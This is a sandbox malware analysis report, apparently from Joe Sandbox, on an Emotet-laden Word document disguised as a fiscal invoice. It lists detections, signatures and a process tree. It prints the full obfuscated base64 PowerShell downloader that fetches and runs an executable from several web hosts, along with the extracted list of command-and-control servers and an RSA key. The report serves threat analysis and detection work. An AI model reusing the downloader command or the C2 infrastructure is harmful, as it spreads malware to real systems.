Loading ...

Play interactive tourEdit tour

Analysis Report factura fiscala 767958063 14 10 2020.doc

Overview

General Information

Sample Name:factura fiscala 767958063 14 10 2020.doc
Analysis ID:298700
MD5:4b34df405d294e43ff0d5bf7a36cf30e
SHA1:c08c1da27b720a7f63538fa7681ce31c1eec5d9c
SHA256:2a4501a9c916de2614ab790c698688048ac5c327c03fdb1910509f81f0f8b9ad

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Encrypted powershell cmdline option found
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
PowerShell case anomaly found
Powershell drops PE file
Uses known network protocols on non-standard ports
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1552 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • powershell.exe (PID: 112 cmdline: POwersheLL -ENCOD JABGAHMAZwA2AGgANwA3AD0AWwBjAGgAYQByAF0ANAAyADsAJABKAGcAMwB2AG8ANQA3AD0AKAAoACcAUQBtACcAKwAnAGMAJwApACsAJwBwAGkAJwArACcANQB5ACcAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAEUATgBWADoAdQBTAGUAUgBQAFIAbwBGAEkATABlAFwAdABjAGUAcQBCAFcAbQBcAEQAYwB4AFcARwBDAEsAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAHIARQBjAHQAbwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBjAGAAVQBgAFIAaQB0AFkAYABwAHIAbwBUAE8AQwBgAG8AbAAiACAAPQAgACgAJwB0AGwAJwArACcAcwAxACcAKwAoACcAMgAnACsAJwAsACAAdAAnACkAKwAnAGwAcwAnACsAKAAnADEAMQAsACAAdAAnACsAJwBsAHMAJwApACkAOwAkAEwAawBtAG8AcABvAHoAIAA9ACAAKAAnAFUAOQAnACsAKAAnAHAAJwArACcAcgB1AHUAJwApACsAJwBmACcAKQA7ACQAWQBnAGoAbgAzAGMAeQA9ACgAJwBHAGoAJwArACcAcgAnACsAKAAnAGIAJwArACcAZQBsADMAJwApACkAOwAkAEQAegBkAGcAdQB5AF8APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAnACsAJwAwAH0AJwArACcAVAAnACsAJwBjAGUAJwArACcAcQBiAHcAbQB7ADAAfQAnACsAKAAnAEQAYwB4ACcAKwAnAHcAZwAnACkAKwAnAGMAawAnACsAJwB7ADAAfQAnACkAIAAtAGYAWwBDAEgAQQByAF0AOQAyACkAKwAkAEwAawBtAG8AcABvAHoAKwAoACcALgAnACsAKAAnAGUAeAAnACsAJwBlACcAKQApADsAJABGAHgANQB6AHUAOAA5AD0AKAAnAEsAJwArACgAJwBuADQAJwArACcAagB4ADQAJwApACsAJwBuACcAKQA7ACQATwA1ADgAMwBsAGsAaQA9ACYAKAAnAG4AZQB3AC0AJwArACcAbwAnACsAJwBiAGoAZQBjAHQAJwApACAATgBlAHQALgBXAGUAYgBjAEwASQBlAG4AdAA7ACQAUABuAG0AaAA2ADIAaAA9ACgAKAAnAGgAJwArACcAdAAnACsAJwB0AHAAOgAvAC8AJwApACsAKAAnAHQAcgAnACsAJwBhAG4AcwAnACsAJwBmACcAKQArACcAZQAnACsAJwByACcAKwAnAHMAdQAnACsAJwB2ACcAKwAoACcAYQBuAC4AYwAnACsAJwBvAG0AJwApACsAJwAvAHcAJwArACgAJwBwAC0AYQBkAG0AaQBuACcAKwAnAC8AJwApACsAJwAwACcAKwAnADcAJwArACgAJwBIAEQAJwArACcAdgAnACkAKwAnADkAagAnACsAKAAnAHUAcgAnACsAJwAvACoAJwApACsAJwBoAHQAJwArACgAJwB0AHAAJwArACcAOgAnACsAJwAvAC8AJwArACcAYwBvAGwAZgBhAHIAJwApACsAJwBzACcAKwAoACcAZQAuAGMAJwArACcAbwBtACcAKQArACgAJwAuACcAKwAnAGEAcgAvAGMAbwAnACkAKwAoACcAbAAnACsAJwBmAGEAJwApACsAKAAnAHIALwBBAC8AKgAnACsAJwBoAHQAdABwACcAKwAnADoAJwApACsAKAAnAC8ALwByACcAKwAnAHUAJwApACsAKAAnAHIAYQBsAGEAZwByACcAKwAnAGkAJwApACsAJwBjAG8AJwArACgAJwBsAGEAJwArACcALgBjACcAKQArACcAbwAnACsAKAAnAG0ALgBiACcAKwAnAHIAJwApACsAKAAnAC8AJwArACcAdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACcALwAnACsAKAAnAEgAWgAnACsAJwA1AHMAJwApACsAKAAnAHkAJwArACcAMwBuACcAKQArACgAJwBMACcAKwAnADcAJwArACcALwAqAGgAdAAnACkAKwAoACcAdAAnACsAJwBwADoAJwApACsAJwAvAC8AJwArACcAdgB6ACcAKwAoACcAbQBpACcAKwAnAG4AJwApACsAJwB0ACcAKwAoACcAZQByACcAKwAnAG4AYQB0AGkAJwApACsAKAAnAG8AbgAnACsAJwBhAGwAJwApACsAJwAuACcAKwAnAGMAbwAnACsAJwBtACcAKwAoACcALgBiACcAKwAnAHIALwB3AHAALQBjACcAKwAnAG8AJwApACsAKAAnAG4AdAAnACsAJwBlACcAKQArACgAJwBuAHQALwBiACcAKwAnAEQANABzACcAKQArACgAJwBBAC8AJwArACcAKgAnACkAKwAnAGgAJwArACgAJwB0AHQAcAA6ACcAKwAnAC8AJwApACsAKAAnAC8AaQAnACsAJwBuACcAKQArACgAJwB0ACcAKwAnAGMALgBzAG8AbAB1ACcAKQArACgAJwB0AGkAJwArACcAbwAnACkAKwAnAG4AJwArACcAcwAnACsAKAAnAC8AdwAnACsAJwBwAC0AYwAnACkAKwAnAG8AbgAnACsAJwB0AGUAJwArACgAJwBuAHQALwAnACsAJwBpAGcAJwApACsAJwA5ACcAKwAoACcATgAnACsAJwAvACoAaAB0ACcAKQArACgAJwB0AHAAJwArACcAOgAvACcAKwAnAC8AaAAnACkAKwAoACcAZQBsACcAKwAnAGkAJwApACsAKAAnAG8AJwArACcAbgBzACcAKQArACgAJwBwAGgAYQByAG0AYQBjACcAKwAnAGUAJwArACcAdQB0ACcAKQArACgAJwBpAGMAJwArACcAYQAnACkAKwAnAGwAJwArACcALgAnACsAJwBjAG8AJwArACcAbQAnACsAJwAvACcAKwAoACcAdwBwACcAKwAnAC0AYQAnACkAKwAoACcAZAAnACsAJwBtAGkAbgAvAGcATwAwAC8AKgAnACsAJwBoAHQAdABwADoALwAvACcAKwAnAHUAJwArACcAbgBpAHQAJwApACsAKAAnAGUAZABkACcAKwAnAGEAdABhACcAKQArACcAYgBhACcAKwAoACcAcwBlAC4AbgBlAHQAJwArACcALwB3AHAAJwApACsAKAAnAC0AYQBkAG0AJwArACcAaQBuACcAKQArACcALwAnACsAJwBTACcAKwAoACcAagBjAFgAJwArACcAeQAnACkAKwAnAFkAbwAnACsAJwAvACcAKQAuACIAcwBQAGAATABJAFQAIgAoACQARgBzAGcANgBoADcANwApADsAJABBADkAdwBpAHYAdAAxAD0AKAAoACcAUwA4ACcAKwAnAGcAJwApACsAJwAwAG4AJwArACcAdwBnACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFcAbABnAGsAOQBwAHoAIABpAG4AIAAkAFAAbgBtAGgANgAyAGgAKQB7AHQAcgB5AHsAJABPADUAOAAzAGwAawBpAC4AIgBEAE8AVwBgAE4ATABgAE8AYQBgAEQAZgBJAGwARQAiACgAJABXAGwAZwBrADkAcAB6ACwAIAAkAEQAegBkAGcAdQB5AF8AKQA7ACQARQBzAGsAOQAyAHEAagA9ACgAJwBGACcAKwAoACcAOQA5AHAAagAnACsAJwBwACcAKQArACcAdAAnACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJAHQAJwArACcAZQBtACcAKQAgACQARAB6AGQAZwB1AHkAXwApAC4AIgBMAGUAbgBnAGAAVABoACIAIAAtAGcAZQAgADIAOAA3ADUAMAApACAAewAmACgAJwBJAG4AdgBvAGsAJwArACcAZQAnACsAJwAtACcAKwAnAEkAdABlAG0AJwApACgAJABEAHoAZABnAHUAeQBfACkAOwAkAFEAXwBnAHoAdABuAHkAPQAoACgAJwBIAF8AJwArACcAeQAxACcAKQArACgAJwBfACcAKwAnADkANAAnACkAKQA7AGIAcgBlAGEAawA7ACQASQBjAGUAdABxAGQAdgA9ACgAJwBPAF8AJwArACcAeAB2ACcAKwAoACcAawBrACcAKwAnAGsAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFQAYgAxAHgAXwA0AHgAPQAoACgAJwBQACcAKwAnAGEAcQBxAHcAJwApACsAJwBtAGoAJwApAA== MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • U9pruuf.exe (PID: 2288 cmdline: 'C:\Users\user\Tceqbwm\Dcxwgck\U9pruuf.exe' MD5: F484B799659D6710E095A3F235D0C596)
      • msdt.exe (PID: 2728 cmdline: C:\Windows\SysWOW64\Storprop\msdt.exe MD5: F484B799659D6710E095A3F235D0C596)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["125.200.20.233:80", "93.186.197.189:7080", "188.166.220.180:7080", "192.175.111.217:7080", "118.243.83.70:80", "103.80.51.61:8080", "185.80.172.199:80", "172.96.190.154:8080", "116.202.10.123:8080", "46.105.131.68:8080", "223.17.215.76:80", "192.210.217.94:8080", "190.194.12.132:80", "115.79.59.157:80", "190.191.171.72:80", "24.231.51.190:80", "203.153.216.178:7080", "175.103.38.146:80", "36.91.44.183:80", "213.165.178.214:80", "113.203.238.130:80", "91.83.93.103:443", "153.229.219.1:443", "126.126.139.26:443", "113.193.239.51:443", "77.74.78.80:443", "37.187.100.220:7080", "198.20.228.9:8080", "190.117.101.56:80", "115.79.195.246:80", "73.55.128.120:80", "185.208.226.142:8080", "190.96.15.50:443", "157.7.164.178:8081", "79.133.6.236:8080", "116.91.240.96:80", "103.93.220.182:80", "50.116.78.109:8080", "192.241.220.183:8080", "8.4.9.137:8080", "91.75.75.46:80", "192.163.221.191:8080", "162.144.145.58:8080", "190.164.135.81:80", "5.79.70.250:8080", "46.32.229.152:8080", "88.247.58.26:80", "183.77.227.38:80", "47.154.85.229:80", "179.5.118.12:80", "143.95.101.72:8080", "103.229.73.17:8080", "109.13.179.195:80", "195.201.56.70:8080", "119.92.77.17:80", "75.127.14.170:8080", "172.105.78.244:8080", "139.59.12.63:8080", "203.56.191.129:8080", "202.29.237.113:8080", "185.142.236.163:443", "178.33.167.120:8080", "60.125.114.64:443", "78.186.65.230:80", "74.208.173.91:8080", "2.58.16.86:8080", "139.59.61.215:443", "190.85.46.52:7080", "121.117.147.153:443", "190.192.39.136:80", "42.200.96.63:80", "94.212.52.40:80", "58.27.215.3:8080", "45.239.204.100:80", "180.148.4.130:8080", "120.51.34.254:80", "113.161.148.81:80", "54.38.143.245:8080", "37.46.129.215:8080", "41.185.29.128:8080", "37.205.9.252:7080", "118.33.121.37:80"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM/TXLLvX91I6dVMYe+T1PPO6mpcg7OJ\ncMl9o/g4nUhZOp8fAAmQl8XMXeGvDhZXTyX1AXf401iPFui0RB6glhl/7/djvi7j\nl32lAhyBANpKGty8xf3J5kGwwClnG/CXHQIDAQAB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2362698639.00000000003D1000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000004.00000002.2119928191.00000000002D0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000005.00000002.2362604745.00000000002A4000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000005.00000002.2362824732.0000000000810000.00000002.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
        • 0x5c5b4:$s1: POwersheLL
        00000004.00000002.2119999154.00000000002F4000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          Click to see the 2 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          5.2.msdt.exe.3d0000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
            4.2.U9pruuf.exe.330000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security

              Sigma Overview

              No Sigma rule has matched

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Antivirus / Scanner detection for submitted sampleShow sources
              Source: factura fiscala 767958063 14 10 2020.docAvira: detected
              Found malware configurationShow sources
              Source: 00000005.00000002.2362604745.00000000002A4000.00000004.00000001.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["125.200.20.233:80", "93.186.197.189:7080", "188.166.220.180:7080", "192.175.111.217:7080", "118.243.83.70:80", "103.80.51.61:8080", "185.80.172.199:80", "172.96.190.154:8080", "116.202.10.123:8080", "46.105.131.68:8080", "223.17.215.76:80", "192.210.217.94:8080", "190.194.12.132:80", "115.79.59.157:80", "190.191.171.72:80", "24.231.51.190:80", "203.153.216.178:7080", "175.103.38.146:80", "36.91.44.183:80", "213.165.178.214:80", "113.203.238.130:80", "91.83.93.103:443", "153.229.219.1:443", "126.126.139.26:443", "113.193.239.51:443", "77.74.78.80:443", "37.187.100.220:7080", "198.20.228.9:8080", "190.117.101.56:80", "115.79.195.246:80", "73.55.128.120:80", "185.208.226.142:8080", "190.96.15.50:443", "157.7.164.178:8081", "79.133.6.236:8080", "116.91.240.96:80", "103.93.220.182:80", "50.116.78.109:8080", "192.241.220.183:8080", "8.4.9.137:8080", "91.75.75.46:80", "192.163.221.191:8080", "162.144.145.58:8080", "190.164.135.81:80", "5.79.70.250:8080", "46.32.229.152:8080", "88.247.58.26:80", "183.77.227.38:80", "47.154.85.229:80", "179.5.118.12:80", "143.95.101.72:8080", "103.229.73.17:8080", "109.13.179.195:80", "195.201.56.70:8080", "119.92.77.17:80", "75.127.14.170:8080", "172.105.78.244:8080", "139.59.12.63:8080", "203.56.191.129:8080", "202.29.237.113:8080", "185.142.236.163:443", "178.33.167.120:8080", "60.125.114.64:443", "78.186.65.230:80", "74.208.173.91:8080", "2.58.16.86:8080", "139.59.61.215:443", "190.85.46.52:7080", "121.117.147.153:443", "190.192.39.136:80", "42.200.96.63:80", "94.212.52.40:80", "58.27.215.3:8080", "45.239.204.100:80", "180.148.4.130:8080", "120.51.34.254:80", "113.161.148.81:80", "54.38.143.245:8080", "37.46.129.215:8080", "41.185.29.128:8080", "37.205.9.252:7080", "118.33.121.37:80"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM/TXLLvX91I6dVMYe+T1PPO6mpcg7OJ\ncMl9o/g4nUhZOp8fAAmQl8XMXeGvDhZXTyX1AXf401iPFui0RB6glhl/7/djvi7j\nl32lAhyBANpKGty8xf3J5kGwwClnG/CXHQIDAQAB"}
              Multi AV Scanner detection for domain / URLShow sources
              Source: transfersuvan.comVirustotal: Detection: 12%Perma Link
              Multi AV Scanner detection for submitted fileShow sources
              Source: factura fiscala 767958063 14 10 2020.docVirustotal: Detection: 53%Perma Link
              Source: factura fiscala 767958063 14 10 2020.docReversingLabs: Detection: 43%
              Machine Learning detection for sampleShow sources
              Source: factura fiscala 767958063 14 10 2020.docJoe Sandbox ML: detected
              Source: 5.2.msdt.exe.3d0000.0.unpackAvira: Label: TR/Dropper.Gen
              Source: 4.2.U9pruuf.exe.330000.0.unpackAvira: Label: TR/Dropper.Gen
              Source: C:\Windows\SysWOW64\Storprop\msdt.exeCode function: 5_2_003D26F0 CryptGenKey,CryptImportKey,LocalFree,CryptCreateHash,CryptAcquireContextW,CryptDecodeObjectEx,CryptDecodeObjectEx,5_2_003D26F0
              Source: C:\Windows\SysWOW64\Storprop\msdt.exeCode function: 5_2_003D22F0 memcpy,CryptGetHashParam,CryptExportKey,GetProcessHeap,RtlAllocateHeap,CryptEncrypt,CryptDestroyHash,CryptDuplicateHash,GetProcessHeap,HeapFree,5_2_003D22F0
              Source: C:\Windows\SysWOW64\Storprop\msdt.exeCode function: 5_2_003D1FD0 CryptDuplicateHash,memcpy,CryptDecrypt,CryptDestroyHash,GetProcessHeap,RtlAllocateHeap,CryptVerifySignatureW,GetProcessHeap,HeapFree,5_2_003D1FD0